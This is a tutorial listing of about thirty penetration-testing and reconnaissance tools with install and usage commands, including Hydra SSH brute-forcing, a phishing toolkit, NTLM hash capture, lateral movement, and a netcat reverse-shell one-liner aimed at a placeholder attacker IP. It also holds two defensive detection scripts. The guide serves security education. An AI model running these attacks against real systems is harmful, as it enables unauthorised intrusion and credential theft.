Comprehensive Guide to the Best Bug Hunting, Pentesting and Recon Tools for 2024: Techniques, Installations, and Usage Examples


1. Amass

Amass is a comprehensive tool for subdomain enumeration and network mapping. It integrates data from multiple sources to map out the attack surface.

Installation:

sudo apt install amass

Usage:

amass enum -d example.com

This command performs subdomain enumeration for example.com to find subdomains.

Example:

  • If example.com has subdomains like api.example.com, mail.example.com, blog.example.com, Amass will list them.

2. Sublist3r

Sublist3r is a fast and powerful tool to discover subdomains of a domain.

Installation:

git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip install -r requirements.txt

Usage:

python sublist3r.py -d example.com

This will enumerate subdomains for example.com.

Example:

  • If example.com has subdomains such as api.example.com, dev.example.com, Sublist3r will find and list them.

3. DirBuster

DirBuster is a multi-threaded tool used for brute-forcing hidden directories and files on a web server.

Installation:

sudo apt install dirbuster

Usage:

dirbuster -H -u http://example.com -l /path/to/wordlist.txt

This command runs DirBuster headless (-H, without the Java GUI) and brute-forces directories and files at example.com using the wordlist passed with -l.

Example:

  • If you are targeting http://example.com/, DirBuster might reveal hidden directories like /admin/, /login/, or /uploads/.

4. Burp Suite

Burp Suite is an integrated platform for testing the security of web applications. It helps with vulnerability scanning, intrusion testing, and fuzzing.

Installation:

  • Download the installer from PortSwigger's Burp Suite page.
  • Follow the installation steps for your platform.

Usage:

  1. Set up Burp Suite and configure your browser to use Burp’s proxy: 127.0.0.1:8080.
  2. In Burp Suite, go to the “Proxy” tab, and you can intercept HTTP/S requests and responses.
  3. Use the “Scanner” (the “Dashboard” in current versions; active scanning requires Burp Suite Professional) to scan for vulnerabilities like SQL injection or Cross-Site Scripting (XSS).

Example:

  • Intercept a request like GET /login?username=admin&password=1234 and modify it for testing.

5. Hydra

Hydra is a password cracking tool used to perform brute-force attacks on various services like SSH, FTP, HTTP, etc.

Installation:

sudo apt install hydra

Usage:

hydra -l admin -P /path/to/rockyou.txt ssh://example.com

This command attempts to brute-force SSH login on example.com with the username admin using the wordlist rockyou.txt.

Example:

  • If the correct password is admin123, Hydra will reveal it after attempting multiple passwords from the wordlist.
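From the defending side, an attempt like the one above leaves a very recognisable trace in sshd's log. The following Python script is an added illustration, not part of the original guide: it parses a constructed auth.log excerpt, flags a source address that fails repeatedly inside a short window, and reports separately when a success from the same source follows the burst (the guessed-password case). The log lines, host name and addresses are constructed; the threshold and window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt (syslog format). The first source fails five times in
# a few seconds and then logs in, which is what a wordlist attack looks like on the
# server side; the second source is an ordinary user with one typo.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web1 sshd[2101]: Failed password for admin from 203.0.113.7 port 51012 ssh2
Mar  3 10:15:02 web1 sshd[2103]: Failed password for admin from 203.0.113.7 port 51014 ssh2
Mar  3 10:15:02 web1 sshd[2105]: Failed password for invalid user test from 203.0.113.7 port 51016 ssh2
Mar  3 10:15:03 web1 sshd[2107]: Failed password for admin from 203.0.113.7 port 51018 ssh2
Mar  3 10:15:04 web1 sshd[2109]: Failed password for admin from 203.0.113.7 port 51020 ssh2
Mar  3 10:15:05 web1 sshd[2111]: Accepted password for admin from 203.0.113.7 port 51022 ssh2
Mar  3 10:20:00 web1 sshd[2200]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Mar  3 10:20:30 web1 sshd[2202]: Accepted publickey for alice from 198.51.100.4 port 40003 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_sshd_log(text, year=2024):
    """Turn sshd auth lines into dicts; syslog timestamps carry no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd/syslog lines are skipped
        stamp = " ".join(m["ts"].split())  # collapse the double space in "Mar  3"
        events.append({
            "ts": datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S"),
            "result": m["result"],
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag a source IP once it has `threshold` failures inside `window_seconds`.

    A successful login from the same IP at or after the burst is reported too: that is
    the signature of a guessed password rather than a mere lockout-style nuisance.
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        burst_end = None
        start = 0
        for end in range(len(failures)):  # sliding window over failure timestamps
            while (failures[end]["ts"] - failures[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = failures[end]["ts"]
                break
        if burst_end is None:
            continue
        later_success = [e for e in evs if e["result"] == "Accepted" and e["ts"] >= burst_end]
        alerts.append({
            "ip": ip,
            "failures": len(failures),
            "users": sorted({e["user"] for e in failures}),
            "success_after_burst": later_success[0]["user"] if later_success else None,
        })
    return alerts


def analyze(text):
    return detect_bruteforce(parse_sshd_log(text))


if __name__ == "__main__":
    for alert in analyze(SAMPLE_AUTH_LOG):
        print(alert)
```

Run against the constructed excerpt, the script reports 203.0.113.7 with five failures against two usernames and a later successful login as admin, while alice's single typo produces nothing. In production the same logic would sit behind a log shipper, and the alert with a non-empty success_after_burst field is the one that warrants an immediate password reset.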

6. Nikto

Nikto is a web server scanner that checks for common vulnerabilities such as outdated software and server misconfigurations.

Installation:

sudo apt install nikto

Usage:

nikto -h http://example.com

This command scans example.com for vulnerabilities.

Example:

  • Nikto might discover that example.com is running an outdated version of Apache, which could have known security issues.

7. WPScan

WPScan is a WordPress vulnerability scanner that detects security flaws in WordPress websites, including outdated plugins and themes.

Installation:

sudo apt install wpscan

Usage:

wpscan --url http://example.com

This command scans example.com for WordPress-related vulnerabilities.

Example:

  • WPScan could reveal that example.com is running an outdated version of the WordPress plugin Contact Form 7, which has known vulnerabilities.

8. Social-Engineer Toolkit (SET)

SET is a toolkit for automating social engineering attacks like phishing, credential harvesting, and more.

Installation:

sudo apt install set

Usage:

setoolkit

After running the command, select the social engineering attack you’d like to perform (e.g., phishing, credential harvesting, etc.).

Example:

  • You can use SET to create a fake login page mimicking example.com and harvest login credentials.

9. Responder

Responder is a tool that captures NTLM hashes from unencrypted SMB, HTTP, and NetBIOS traffic in internal networks.

Installation:

git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Usage:

sudo python3 Responder.py -I eth0

This command listens for SMB, HTTP, and NetBIOS traffic on interface eth0 to capture NTLM hashes.

Example:

  • You may intercept traffic containing an NTLM hash like 9a0c8e6b018bda0d05652fe9adadf7c8, which can later be cracked offline.

10. Netcat (nc)

Netcat is a powerful tool for network debugging, banner grabbing, and reverse shells.

Installation:

sudo apt install netcat-traditional

On Debian-based systems the plain netcat package is only a transitional alias for one of two implementations; netcat-traditional is the one that supports the -e option used in the example below.

Usage:

nc -lvp 4444

This command listens on port 4444 for incoming connections.

Example:

  • To establish a reverse shell, the target can run nc -e /bin/bash <attacker_ip> 4444, and the attacker can connect to the victim’s shell using nc -lvp 4444.

11. Shodan

Shodan is a search engine for internet-connected devices and services. It can help discover exposed services and devices vulnerable to attacks.

Installation:

pip3 install shodan

Usage:

shodan init <YOUR_API_KEY>
shodan search apache

The first command stores your Shodan API key, which every query requires; the second searches Shodan for devices running the Apache HTTP Server.

Example:

  • Shodan might return results of devices with exposed Apache servers, like 192.168.1.100 running Apache 2.4, which may have security flaws.

12. Recon-ng

Recon-ng is an open-source web reconnaissance framework for gathering intelligence about domains and subdomains.

Installation:

git clone https://github.com/lanmaster53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS

Usage:

./recon-ng

After launching, install a module from the marketplace (for example marketplace install recon/domains-hosts/hackertarget), load it with modules load, set its SOURCE option to the target domain and run it to perform reconnaissance on that domain.

Example:

  • You can use the whois module to gather domain registration information on example.com.

13. Nmap

Nmap is one of the most popular network scanning tools, used for host discovery, port scanning, and service enumeration.

Installation:

sudo apt install nmap

Usage:

nmap example.com

This command scans the host example.com for open ports and services.

Example:

  • Nmap might find that example.com has open ports 80 (HTTP), 443 (HTTPS), and 22 (SSH), which can be further explored.

14. Gobuster

Gobuster is a fast web directory and subdomain brute-forcing tool.

Installation:

sudo apt install gobuster

Usage:

gobuster dir -u http://example.com -w /path/to/wordlist.txt

This command attempts to brute-force directories and files on example.com.

Example:

  • Gobuster might find directories like /admin/ or /private/ on example.com.

15. Aquatone

Aquatone is a tool that takes screenshots of web domains and subdomains, helping with reconnaissance and visual mapping of web assets.

Installation:

gem install aquatone

This installs the original Ruby version. The current Go rewrite is distributed as a release binary from https://github.com/michenriksen/aquatone and reads host names from standard input.

Usage:

aquatone-discover --domain example.com
aquatone-scan --domain example.com
aquatone-gather --domain example.com

aquatone-discover enumerates subdomains of example.com, aquatone-scan checks which of them answer on web ports, and aquatone-gather visits those hosts and saves a screenshot of each. With the Go version the equivalent is cat subdomains.txt | aquatone.

Example:

  • Aquatone could capture screenshots for subdomains like www.example.com, api.example.com, dev.example.com, etc.

16. Masscan

Masscan is a very fast port scanner that can scan large networks at high speeds.

Installation:

sudo apt install masscan

Usage:

masscan -p80,443 192.168.1.0/24

This command scans the IP range 192.168.1.0/24 for open HTTP and HTTPS ports.

Example:

  • Masscan might show that 192.168.1.1 has open ports 80 (HTTP) and 443 (HTTPS), indicating a web server.


17. SSRFmap

SSRFmap is a tool for finding Server-Side Request Forgery (SSRF) vulnerabilities in web applications.

Installation:

git clone https://github.com/swisskyrepo/SSRFmap.git
cd SSRFmap
pip install -r requirements.txt

Usage:

python3 ssrfmap.py -r request.txt -p url -m portscan

Here request.txt is a raw HTTP request to example.com (saved from Burp, for instance), -p names the parameter that carries the user-supplied URL, and -m selects the module to run; the portscan module checks whether that parameter can be made to reach services on the server's own network, which is the SSRF condition being tested for.

Example:

  • If example.com allows a request to internal services via user input, SSRFmap could potentially identify the vulnerability.

18. ReconDog

ReconDog is a multi-purpose reconnaissance tool that automates domain enumeration, subdomain discovery, and other scans.

Installation:

git clone https://github.com/Tuhinshubhra/ReconDog.git
cd ReconDog
chmod +x setup.sh
./setup.sh

Usage:

./ReconDog.sh -d example.com

This command performs multiple recon techniques for example.com, including subdomain enumeration and DNS analysis.


19. Ffuf (Fuzz Faster U Fool)

Ffuf is a fast web fuzzer that is useful for discovering directories, files, and even virtual hosts on a target domain. It’s lightweight and highly customizable.

Installation:

go install github.com/ffuf/ffuf@latest

Usage:

ffuf -w /path/to/wordlist.txt -u http://example.com/FUZZ

This command will fuzz the URL http://example.com/FUZZ using words from the wordlist provided.

Example:

  • If example.com has hidden files like /admin/ or /secret/, ffuf will discover them.

20. DNSMap

DNSMap is a DNS network mapper that enumerates subdomains by brute-forcing DNS records.

Installation:

git clone https://github.com/mm0r1/dnsmap.git
cd dnsmap
make

Usage:

./dnsmap example.com

This command attempts to discover subdomains of example.com by brute-forcing DNS records with the built-in wordlist (dnsmap takes the domain as a positional argument; pass -w to supply your own list).

Example:

  • DNSMap might discover subdomains like mail.example.com, blog.example.com, etc.

21. Shodan Search

Shodan is a search engine for internet-connected devices. It finds devices running various services, including outdated software, exposed databases, and more.

Installation:

pip install shodan

Usage:

shodan init <YOUR_API_KEY>
shodan search apache

The first command stores your Shodan API key, which every query requires; the second searches Shodan for servers running Apache HTTP Server.

Example:

  • Shodan might return results showing vulnerable Apache servers with specific open ports, which can be explored for known exploits.

22. Spiderfoot

Spiderfoot is an open-source OSINT (Open-Source Intelligence) tool for automating the gathering of information about IP addresses, domain names, and more.

Installation:

git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot
pip3 install -r requirements.txt

Usage:

python3 sf.py -s example.com -u all

This command starts a scan of the domain example.com with every module enabled (-u selects a use case: all, footprint, investigate or passive; sf.py refuses to run without -u, -m or -t) and collects open ports, subdomains, email addresses, and more.

Example:

  • Spiderfoot will gather information such as IP addresses, WHOIS data, and other associated domain information.

23. Knockpy

Knockpy is a subdomain scanner written in Python, designed to discover subdomains by brute-forcing domain names.

Installation:

git clone https://github.com/guelfoweb/knock.git
cd knock
pip install -r requirements.txt

Usage:

python3 knockpy.py -d example.com

This command performs subdomain enumeration for example.com (older releases take the domain as a positional argument instead of -d).

Example:

  • Knockpy might find subdomains like api.example.com, dev.example.com, and secure.example.com.

24. OpenVAS

OpenVAS is an open-source vulnerability scanner that scans entire networks to find security issues in web applications and network services.

Installation:

sudo apt install gvm
sudo gvm-setup

Usage:

sudo gvm-start

OpenVAS now ships as part of Greenbone Vulnerability Management (gvm), and the old openvas-start command no longer exists. gvm-setup initialises the database and downloads the vulnerability feeds (this takes a while); gvm-start launches the scanner and the web interface at https://127.0.0.1:9392, where targets and scan tasks are configured and run.

Example:

  • OpenVAS might detect vulnerabilities in web services like SQL injection or outdated versions of Apache or nginx.

25. SpiderMan

SpiderMan is a framework used for reconnaissance and bug hunting. It helps automate the process of discovering new subdomains, checking SSL certificates, and performing DNS queries.

Installation:

git clone https://github.com/devanshbatham/SpiderMan.git
cd SpiderMan
pip install -r requirements.txt

Usage:

python3 spiderMan.py -d example.com

This command will gather subdomains and other relevant data for example.com.

Example:

  • SpiderMan might reveal subdomains such as api.example.com, ftp.example.com, and mail.example.com.

26. Recon-ng

Recon-ng is a full-featured web reconnaissance framework. It comes with a powerful set of modules for gathering information on domains, subdomains, and much more.

Installation:

git clone https://github.com/lanmaster53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS

Usage:

./recon-ng

After launching, you can load modules like whois to gather WHOIS data for example.com.

Example:

  • Recon-ng can find the domain’s registrant details, IP address, and associated assets.

27. ZAP (OWASP Zed Attack Proxy)

ZAP is a security scanner used to find vulnerabilities in web applications, including SQL injections and cross-site scripting (XSS).

Installation:

sudo apt install zaproxy

Usage:

  1. Open ZAP GUI with zaproxy.
  2. Configure ZAP as your proxy server (127.0.0.1:8080).
  3. Use ZAP’s active scan to find vulnerabilities on example.com.

Example:

  • ZAP might detect vulnerabilities like SQL injections, weak SSL/TLS configurations, or open ports.

28. TCPdump

TCPdump is a network packet analyzer used to capture and analyze network traffic.

Installation:

sudo apt install tcpdump

Usage:

sudo tcpdump -i eth0 -nn -s0

This command will capture network traffic on interface eth0 and display it in real-time.

Example:

  • You can capture HTTP traffic, extract session cookies, or monitor DNS queries to find sensitive information being transmitted in plaintext.

29. BloodHound

BloodHound is an Active Directory enumeration tool that helps in finding privilege escalation paths in Windows domains.

Installation:

git clone https://github.com/BloodHoundAD/BloodHound.git
cd BloodHound
npm install

Usage:

SharpHound.exe -c All --domaincontroller <IP of the Domain Controller>

The BloodHound GUI (pre-built releases are also available from the repository) needs a running Neo4j database. SharpHound is the collector: run from a domain-joined Windows host, -c All gathers sessions, group memberships and ACLs and writes a zip archive that is then imported into the GUI to find possible attack paths in an Active Directory environment.

Example:

  • BloodHound can reveal paths like users with administrative rights or groups with elevated privileges.

30. Netdiscover

Netdiscover is a tool for network discovery, mainly used for identifying live hosts in a subnet.

Installation:

sudo apt install netdiscover

Usage:

sudo netdiscover -r 192.168.1.0/24

This will scan the subnet 192.168.1.0/24 for live hosts.

Example:

  • Netdiscover will display all live hosts in the subnet, such as 192.168.1.1, 192.168.1.2, and their MAC addresses.

31. Nikto

Nikto is a web server scanner that checks for outdated software, security flaws, and vulnerabilities like SQL injections, XSS, etc.

Installation:

sudo apt install nikto

Usage:

nikto -h http://example.com

This scans example.com for known vulnerabilities in the web server.

Example:

  • Nikto may find issues like outdated Apache versions or misconfigurations that can be exploited.

32. Patator

Patator is a powerful multi-purpose brute-forcing tool that supports various protocols and is more customizable than traditional tools like Hydra.

Installation:

git clone https://github.com/lanjelot/patator.git
cd patator

Usage:

python3 patator.py http_fuzz url=http://example.com/FILE0 0=/path/to/wordlist.txt -x ignore:code=404

This command fuzzes the URL with the wordlist to discover hidden directories: Patator takes key=value arguments, FILE0 is replaced by each line of the file given as 0=, and -x ignore:code=404 hides responses for paths that do not exist.

Example:

  • Patator might discover hidden endpoints like /admin/ or /login/.

33. CrackMapExec (CME)

CrackMapExec is a tool for automating the post-exploitation process in a Windows network. It helps in SMB enumeration, credential validation, and lateral movement.

Installation:

git clone https://github.com/byt3bl33d3r/CrackMapExec.git
cd CrackMapExec
python3 setup.py install

Usage:

crackmapexec smb 192.168.1.0/24 -u 'user' -p 'password'

This command checks whether the credentials user:password are valid over SMB on every host in the subnet 192.168.1.0/24 and lists which ones accepted them.

Example:

  • CrackMapExec can identify machines where the credentials are valid, helping you move laterally in the network.

34. Subjack

Subjack is a subdomain takeover vulnerability scanner, checking for vulnerable DNS configurations that allow attackers to seize control of subdomains.

Installation:

go install github.com/haccer/subjack@latest

Usage:

subjack -w subdomains.txt -t 100 -o results.txt

This command checks for potential subdomain takeovers listed in subdomains.txt.

Example:

  • Subjack could find that the ftp.example.com subdomain is vulnerable to takeover.
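The condition Subjack looks for can be checked from the zone owner's side as well. The following Python example is added here and is not Subjack's own code: it walks a constructed set of CNAME records, asks a resolver whether each target still exists, and rates a dead target higher when it points into a self-service hosting provider whose names anyone can register. The record data, the resolver table and the short provider suffix list are constructed; a real run would substitute a DNS lookup for the table.

```python
# Constructed zone excerpt: subdomains of example.com and the CNAME each one points at.
SAMPLE_CNAMES = {
    "www.example.com": "www.example.com.cdn.cloudflare.net",
    "blog.example.com": "example-blog.github.io",
    "ftp.example.com": "legacy-ftp.example-hosting.net",
    "api.example.com": "api-lb.example-cloud.net",
}

# Constructed resolver answers: True = the target has records, False = NXDOMAIN.
SAMPLE_RESOLVES = {
    "www.example.com.cdn.cloudflare.net": True,
    "example-blog.github.io": False,
    "legacy-ftp.example-hosting.net": False,
    "api-lb.example-cloud.net": True,
}

# Hosted-service suffixes where an unregistered name can usually be claimed by anyone.
# Subjack ships a much longer, fingerprint-based list; this one is illustrative.
CLAIMABLE_SUFFIXES = (
    ".github.io",
    ".herokuapp.com",
    ".azurewebsites.net",
    ".s3.amazonaws.com",
)


def find_dangling_cnames(cnames, resolves):
    """Return findings for CNAMEs whose target no longer resolves.

    `resolves` is a callable name -> bool so the same logic can run against a real
    resolver (for example dnspython's dns.resolver, treating NXDOMAIN as False).
    """
    findings = []
    for name, target in sorted(cnames.items()):
        if resolves(target):
            continue  # target exists; nothing is dangling
        claimable = any(target.endswith(s) for s in CLAIMABLE_SUFFIXES)
        findings.append({
            "name": name,
            "target": target,
            # A dead CNAME into a self-service provider is the classic takeover case;
            # a dead CNAME elsewhere is still stale DNS that should be removed.
            "risk": "high" if claimable else "medium",
        })
    return findings


def sample_resolver(name):
    """Stand-in for a DNS lookup, backed by the constructed table above."""
    return SAMPLE_RESOLVES.get(name, False)


if __name__ == "__main__":
    for f in find_dangling_cnames(SAMPLE_CNAMES, sample_resolver):
        print(f"{f['name']} -> {f['target']}: {f['risk']} (target does not resolve)")
```

The fix in every case is the same and is on the DNS side: delete the CNAME, or re-create the resource it points at, before anyone else does. Scheduling this check against your own zone export is cheaper than waiting for a bug bounty report about ftp.example.com.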
